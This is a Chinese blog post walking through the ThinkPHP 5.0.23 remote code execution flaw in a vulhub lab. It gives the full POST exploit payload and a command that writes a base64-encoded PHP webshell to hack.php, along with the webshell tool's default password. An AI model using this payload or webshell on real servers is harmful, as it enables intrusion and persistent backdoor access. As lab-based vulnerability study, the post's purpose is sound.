vulhub thinkphp5 5.0.23 远程代码执行漏洞

最新推荐文章于 2024-08-11 19:27:09 发布
最新推荐文章于 2024-08-11 19:27:09 发布
阅读量787 收藏 1
点赞数 1
文章标签: php 开发语言 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53696027/article/details/129567444
版权

漏洞介绍

影响版本

Thinkphp <= 5.0.23

漏洞原理

ThinkPHP5框架底层对控制器名过滤不严,从而让攻击者可以通过url调用到ThinkPHP框架内部的敏感函数,进而导致getshell漏洞

漏洞威胁

任意命令执行、上传木马和后门、读取敏感文件等

防护方式

升级thinkphp框架版本,因为这个漏洞只能影响的对应的版本。

漏洞复现

环境搭建

通过docker启动vulhub中自带的靶场进行复现该漏洞

cd vulhub/thinkphp/5.0.23-rce/ #进入漏洞环境所在目录
docker-compose up -d     #启动靶场
docker ps    #查看容器信息

复现过程

访问首页

寻找漏洞点

在IP:8080/index.php?s=captcha也页面通过POST方法发送

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=命令

就可以实现远程命令执行

该漏洞可以通过两种方式实现:一种是hackbar,另一种是BurpSuite

  • HackBar

通过浏览器插件HackBar可以发送POST请求来进行漏洞复现

  • BurpSuite

通过BurpSuite抓包修改请求包内容来进行漏洞利用

 

漏洞利用

对shell脚本进行编码

如果直接将shell.php上传,无法直接上传,因为thinkphp对脚本进行过滤,所以对shell脚本需要进行Base64加密绕过

通过远程执行漏洞上传shell脚本到hack.php文件中

payload:

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo -n 'aGFjaz1lY2hvICI8P3BocApAZXJyb3JfcmVwb3J0aW5nKDApOwpzZXNzaW9uX3N0YXJ0KCk7CiAgICAka2V5PSJlNDVlMzI5ZmViNWQ5MjViIjsKCSRfU0VTU0lPTlsnayddPSRrZXk7CglzZXNzaW9uX3dyaXRlX2Nsb3NlKCk7CgkkcG9zdD1maWxlX2dldF9jb250ZW50cygicGhwOi8vaW5wdXQiKTsKCWlmKCFleHRlbnNpb25fbG9hZGVkKCdvcGVuc3NsJykpCgl7CgkJJHQ9ImJhc2U2NF8iLiJkZWNvZGUiOwoJCSRwb3N0PSR0KCRwb3N0LiIiKTsKCQkKCQlmb3IoJGk9MDskaTxzdHJsZW4oJHBvc3QpOyRpKyspIHsKICAgIAkJCSAkcG9zdFskaV0gPSAkcG9zdFskaV1eJGtleVskaSsxJjE1XTsgCiAgICAJCQl9Cgl9CgllbHNlCgl7CgkJJHBvc3Q9b3BlbnNzbF9kZWNyeXB0KCRwb3N0LCAiQUVTMTI4IiwgJGtleSk7Cgl9CiAgICAkYXJyPWV4cGxvZGUoJ3wnLCRwb3N0KTsKICAgICRmdW5jPSRhcnJbMF07CiAgICAkcGFyYW1zPSRhcnJbMV07CgljbGFzcyBDe3B1YmxpYyBmdW5jdGlvbiBfX2ludm9rZSgkcCkge2V2YWwoJHAuIiIpO319CiAgICBAY2FsbF91c2VyX2Z1bmMobmV3IEMoKSwkcGFyYW1zKTsKPz4K' | base64 -d > hack.php

通过冰蝎连接

通过webshell工具连接后可以对服务器进行危险的恶意操作,包括读取文件和操作文件等。

默认密码:rebeyond

xiaolihello8
关注
[ vulhub漏洞复现篇 ] ThinkPHP 5.0.23-Rce
qq_51577576的博客
10-02 2222
[ vulhub漏洞复现篇 ] ThinkPHP 5.0.23-Rce 漏洞复现 ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞
ThinkPHP 5.0.23 远程代码执行漏洞(CVE-2018-20062)漏洞复现
千寻的博客
12-19 5376
文章目录漏洞名称漏洞编号漏洞描述影响版本实验环境及准备漏洞发现漏洞复现(数据包)漏洞复现(工具)修复建议摘抄免责声明 漏洞名称 ThinkPHP 5.0.23 远程代码执行漏洞 漏洞编号 CVE-2018-20062 漏洞描述 ThinkPHP是一款运用极广的PHP开发框架。 其5.0.23以前的版本中,获取method的方法中没有正确处理方法名, 导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。 由于ThinkPHP5框架对控制器名没有进行足够的安全检测,导致在
复现ThinkPHP5 5.0.23远程代码执行漏洞
NLXHBM的博客
04-15 424
搜索ThinkPHP5.0.23相关漏洞 2. 发现了 5.0.23Remote Code Execution(远程代码执行漏洞) 将该漏洞cp到tp.txt文件并查看 3.burpsuite进行抓包 4.执行命令 5. 写入phpinfo: `echo "<?php phpinfo(); ?>" > /var/www/public/phpinfo.php` 6.查看是否写入: 7.访问http://159.75.16.25:8...
ThinkPHP5 5.0.23 远程代码执行漏洞
EC_Carrot的博客
08-17 369
漏洞简介 ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞漏洞复现 发送如下数据包即可执行id命令: POST /index.php?s=captcha HTTP/1.1 Host: localhost Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: M
ThinkPHP5.0.15漏洞解析及SQL注入
最新发布
m0_70638961的博客
08-11 351
通过查看5.0.15和5.0.16版本的对比,可以看到16版本对在Builder.php里面对数据库的增减做了修正,所以可以15版本的漏洞就存在在这里。这里的代码用的拼接的方式,就可以尝试使用报错注入来实现。到了这里就发现,我们注入的三个值在这里派上了用场,val[1]就是注入的报错语句,这里走完,返回的就是报错注入语句+1,接下来我们继续走,一直走到这里。为了清楚代码是怎么走的,我们可以在insert()打一个断点,重新提交后就可以进入断点了,这里我们可以看到username有三个值。
ThinkPHP5.0.23 远程代码执行漏洞
夜星空如海的博客
09-30 1870
ThinkPHP 是一款运用极广的 PHP 开发框架。其 5.0.23 以前的版本中,获取 method 的方法中没有正确处理方法名,导致攻击者可以调用 Request 类任意方法并构造利用链,从而导致远程代码执行漏洞
[漏洞复现]ThinkPHP5 核心类 Request 远程代码执行
wwxxee
05-20 536
ThinkPHP 5.x 核心类 Request 远程代码执行漏洞复现 影响版本: ThinkPHP 5.0.x ~ 5.0.23 ThinkPHP 5.1.x ~ 5.1.31 ThinkPHP 5.2.0beta1 环境: vulhub-master/thinkphp/5.0.23-rce 启动docker环境之后,访问: http://ip:8080/ POC: POST /index.php?s=captcha HTTP/1.1 Host: 192.168.17.134:8080 User-Age
记录一次vulhub:ThinkPHP5 5.0.23远程代码执行漏洞复现
sszsNo1的博客
06-26 321
复现vulhubThinkPHP5 5.0.23远程代码执行漏洞
thinkphp5.0.23漏洞复现以及脚本编写
weixin_45653478的博客
04-26 995
ThinkPHP5.0.23漏洞主要涉及远程代码执行(RCE)的安全隐患。这一漏洞的存在是因为ThinkPHP框架在底层对控制器名的过滤不够严格,导致攻击者有可能通过特定的URL构造,调用到框架内部的敏感函数,进而执行任意命令。
ThinkPHP 5.0 远程代码执行漏洞分析
02-21
ThinkPHP 5.0 远程代码执行漏洞分析
thinkphp 远程代码执行漏洞poc
12-11
漏洞影响范围:v5.x < 5.1.31,<= 5.0.23 可以利用poc直接检测目标网站是否存在漏洞
网络安全深入学习第二课——热门框架漏洞(RCE—Thinkphp5.0.23 代码执行
p36273的博客
09-16 1564
简言之,别人帮你建好了房子但尚未装修,你需要在别人设计好的户型里去装修,省去你搬砖的重复性操作。------ ThinkPHP发展至今,核心版本主要有以下几个系列,ThinkPHP 2系列、ThinkPHP 3系列、ThinkPHP 5系列、ThinkPHP 6系列,各个系列之间在代码实现及功能方面,有较大区别。其中ThinkPHP 2以及ThinkPHP 3系列已经停止维护,ThinkPHP 5系列现使用最多,而ThinkPHP 3系列也积累了较多的历史用户。
Thinkphp5.0.23远程代码执行漏洞复现
02-01 1722
Thinkphp5.0.23远程代码执行漏洞介绍、成因和复现。
ThinkPHP5 5.0.23远程代码执行漏洞+webshell工具连接(复现详细过程)
m0_52701599的博客
03-17 3300
ThinkPHP5 5.0.23远程代码执行漏洞+webshell工具连接(复现详细过程)
漏洞复现----38、ThinkPHP5 5.0.23 远程代码执行漏洞
七天
06-29 1678
ThinkPHP 5.0.23远程代码执行漏洞
ThinkPHP5 5.0.23 远程代码执行漏洞复现
weixin_54786196的博客
09-01 466
是由于框架对控制器名没有进行敏感字符检测,导致在没有开启强制路由的情况下可能导致远程代码执行。至此 ThinkPHP5 5.0.23 远程代码执行漏洞 复现成功。id是我们执行的命令,可更换我们需要的命令。5.0.23和5.1.31之前的所有版本。改变传参方式 GET改为POST。访问靶机ip+端口号8080。使用burp抓到首页的包。
ThinkPHP 5.0 远程代码执行漏洞详解
"ThinkPHP 5.0 远程代码执行漏洞分析" 在网络安全领域,远程代码执行漏洞是一种极其危险的漏洞,允许攻击者在受害者的服务器上执行任意代码。这篇关于ThinkPHP 5.0 远程代码执行的分析报告,专注于探讨了如何利用这...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值